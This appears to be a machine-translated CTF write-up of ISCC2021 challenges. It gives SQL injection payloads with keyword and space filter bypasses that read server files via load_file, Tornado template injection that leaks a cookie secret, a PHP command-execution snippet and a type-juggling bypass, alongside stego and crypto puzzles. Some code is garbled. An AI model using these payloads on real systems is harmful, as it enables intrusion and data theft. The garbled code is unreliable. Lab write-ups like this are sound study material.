ISCC2021 - reproduction of some topics

Posted by ATLien on Tue, 08 Feb 2022 02:18:25 +0100

to practice martial arts

easyweb

Obviously, this problem needs sql injection, but I don't know the injection point
After testing, it is judged that the injection point is: 'closed', and the symbol is replaced by% 23
In the later test, it is found that the space is filtered. We can use% 0d to bypass it
Try to find union and select using union query, and try to bypass using double write
payload
?id=0'%0dununionion%0dselselectect%0d1,2,3%23
Get display bit
According to the consistent style, burst the database name

?id=0'%0dununionion%0dselselectect%0d1,database(),3%23


Then there is the explosion table name. After testing, it is found that from and information_schema is also filtered

1,from You can try double writing or uppercase conversion to bypass
2,information_schema If yes, you can try to convert the same type. Check the version, 5.7.33,existence sys Database, so you can use sys Database lookup table name


Construct payload
?id=0'%0dununionion%0dselselectect%0d1,(selselectect%0dgroup_concat(table_name)%0dFROM%0dsys.schema_table_statistics_with_buffer),3%0d%23

Get table name
Number of judgment columns
?id=0'%0dununionion%0dselselectect%0d1,(selselectect%0dgroup_concat(table_name)%0dFROM%0dsys.schema_auto_increment_columns),3%0d%23
Table names are iscc_flag
Blind guess list name is: flag
Construct payload

?id=0'%0dununionion%0dselselectect%0d1,(selselectect%0dflag%0dfrom%0discc_flag),3%0d%23


Enter this page to get the source code for analysis

`<?php

if(isset($_GET['c'])){
c = c= c=_GET['c'];

if(preg_match("/[zxcvbMnlkjhgfsaoiuytreq]+|[ZXCVBNLKKJHGFSAOIUYTREQ]+|[0123456789]+|\(|\/|\*|\-|\+|\.|\{|\}|\[|\]|\'|\"|\?|\>|\<|\,|\)|\(|\&|\^|\%|\#|\@|\!/", $c)){
   exit("die!!");
}else{
 echo `$c`;
}

}else{
highlight_file(FILE);
}
?>

`

Nothing seems to be found. Compare the 26 English alphabets with the above English characters zxcvbMnlkjhgfsaoiuytreq
If the unfiltered letters are found to have dmpw, execute pwd to obtain the file path,
Get the flag location and use load_file() method
?id=0'%0dununionion%0dseselectlect%0d1,(load_file('/var/www/const/flllllllllaaag.php')),3%0d%23


Or
? Id = - 1 '% 0dunionion% 0dselselectect% 0d1, (load_file (' / etc / apache2 / sites available / 000 default. Conf ')), 3% 23 / / this path is the default
Get site path


View flag in source code

tornado


Enter the files in three paths and find flag Txt flag in / fllllaaaaaag;
welcome.txt prompts the render function, and there is template injection of render function in Baidu;
hints.txt tells us that md5(cookie_secret+md5(filename)) finds that we need md5

View hints Txt path

http://39.96.91.106:7060/file?filename=/hints.txt&filehash=c61a0774797a56fc60854ac778aa3d15

There is a filehash parameter. According to the prompt given, the value of filehash is MD5 processing. With filehash, cookies are also required_ In this step of secret, you can refer to the previous question type, and a big man will make a clear explanation Look here
Construct payload

error?msg={{handler.settings}}


Get cookies_ Secret to calculate the hash value
Get the big guy script

import hashlib


def md5encode(str):
    m = hashlib.md5()
    m.update(str)
    return m.hexdigest()


name = '/fllllllllllllaaaaaag'
secret = 'ef57c331-744f-4528-b434-9746317d4f6a'
name = name.encode()
bb = md5encode((secret + md5encode(name)).encode())
print(bb)

Li Hua's red envelope


010Editor open

24,43,13,13,12,21,43

I tried it. It's a bit like a tap code

Finally, the flag:ISCCBFS is obtained

Mirage-1

There is nothing useful to open the document. Change the document into zip format

Click in to find flag

Beauty trick

Open the file and find the prompt information in a picture format

Obviously, this is AES encryption, and the key is ISCC2021
Open the document, there is a QR code, and the information can be scanned

U2FsdGVkX1/Ka+sScszwQkwhO+VLiJwV/6IFg5W+TfNHGxG2qZsIr2iwMwb9X9Iu 3GuGWmPOtO27z8vNppD2D50fwsD+8VWhdtW9J4cewYivH/Z/7GoUvcJXJMrvf+vu +CBqWDGp6HWd0e5whGhuzlK0ZtBcDZdPDSIHA7+GuUlifp8PcFCtJPgiuk143REE +pKFiSJXolXLR1vJCdGY9w5mXFbiWPrb2U7r/v5noP8=

Decrypt three times to get the character: y0u_h@ve_fal1en_intO_tHe_tr@p_0f_tHe_be@uty_ !

It's a big head!!
Try to change the word document into a compressed package in ny4w1nbmry4m You can see two image s in zip \ word \ media
One of them is the QR code, and another QR code. The scanning result is

U2FsdGVkX19eOY/pDh8+vPAcvfkLi1XLUneVzjLLOMul53sKK8UpobdCOiPIv4KE


However, AES decryption failed, so try DES to get the flag

What's my discount

After downloading the file, run the exe file to get a string of codes
pass1{\u006b\u0072\u0077}, Unicode encoding, decoded as pass1{krw}
Open the compressed package in 010Editor and find it at the end

cGFzczJ7Z2NjNjY2fQ==

base64 encoding: pass2{gcc666}
Combine with password: krwgcc666 unpack the compressed package

eW91Zm91bmRtZT8=

base64 is: you foundme?
Next, there is a file in MP3 format. MP3 is usually decrypted with MP3stego. The password is youfoundme?
Get ISCC{LFXXK4TENFZWG33VNZ2DELRRGU =============

Perform base32 decryption

Check it

After decompression, there is a picture. Try binwalk to separate it
After decompressing the file, it is found that there is a string 01 after the document is opened
Associate it with 01 string and draw QR code
First look at the length of the string and find that it is 841, which is exactly the square of 29. That should be the QR code

from PIL import Image
MAX = 29    #The width and height are 841 01 strings, so the width and height are 29
pic = Image.new("RGB",(MAX, MAX))
#If it is (255255255), (0,0,0), you need to convert 01 first 
str = "1111111000100100110000111111110000010011011110010101000001101110100111010011010010111011011101000000111011110101110110111010010111101110001011101100000101110111000010010000011111111010101010101010111111100000000011100100110100000000100101101110000101010101000001101000011101011011011100101000001110010010001111011110010001100000101101100111111001010110101101110000100011110100110001001100010010101110000111111111110010100110101001111110010110001100110111110111000110011110010001111001110000100011010000110100100000001011001010101101110100011011010011100011101001111011111000101001101101101100101010001111101000000000011101101101010001011011111110000011110000101011010100000101011110010101000101101011101001010011001011111001010111010110101111000001101001101110100101010000010100111011000001000011101000011001001011111110100100100000111100110"
i=0
for y in range (0,MAX):
    for x in range (0,MAX):
        if(str[i] == '1'):
            pic.putpixel([x,y],(0, 0, 0))
        else:
            pic.putpixel([x,y],(255,255,255))
        i = i+1
pic.show()
pic.save("./flag.png")

Get QR code scanning

Xiao Ming's pet picture

After downloading is a picture
Separate the picture with binwalk to get the flag Txt and key zip
flag.txt is U2FsdGVkX18kNy7RlBvcV9WJsqa+oxvdd0Ir86U2cU2996N6ltZi7VVOaw==
Obviously, key decryption is required

Open key Zip to find the key Txt is only 5 bytes in size. Combined with the rabbit's statement that it needs collision, it should be crc32 collision. Try to find (0_0) as the key

Xiao Ming's expression bag


It can be seen that this is Caesar's decryption, but the offset is unknown. Through enumeration, it is found that the offset is: 13:00 is the English date. With the prompt, you can think of 1999, but the month and date are not. They are all numbers, and the byte is 8 bits. You can use Ziperello to burst



Get password: 07071999
Then it is not supported when opening the file, so check in winhex and find that its file header is missing. Then add it and get the picture

arena

ISCC customer service (I)


The ticket can be changed directly, but the ticket swiping behavior will be detected

Since you don't want to swipe the votes, just turn off the voting button of the other party!
We can enter the developer mode through Firefox browser F12 to modify the source code and directly delete the voting button of the other party 😼


You can see the other party and the number of votes is about 50 or 60, so we need to enter the post fast developer mode. After modification, it's good to count the votes that exceed the other party within 20s

What is this

Check the source code and find that this is a JS code. Copy the code directly and put it on the console to run

Web01

Go in and have a look according to the prompt


This stubborn little temper, let's go in and have a look 😏😏
39.96.91.106:7040/code/code.txt

<?php
<p>code.txt</p>

if (isset ($_GET['password'])) {
     
	if (preg_match ("/^[a-zA-Z0-9]+$/", $_GET['password']) === FALSE)
	{
		echo '<p>You password must be alphanumeric</p>';
	
    }
	  else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
	{    
    
		if (strpos ($_GET['password'], '*-*') !== FALSE)
		{
			die('Flag: ' . $flag);
		}
		else
		{
			echo('<p>*-* have not been found</p>');
		}
	}
	else
	{
		echo '<p>Invalid password</p>';
	}
}
?>

After auditing the source code, I found the little secret of the author
It can be seen that the password required to be entered must be less than eight digits and the value must be greater than 999999 and added at the end*-*
According to scientific counting method 1e9 = 1000000000 > 999999
So structure
payload:1e9*-*

Topics: Web Development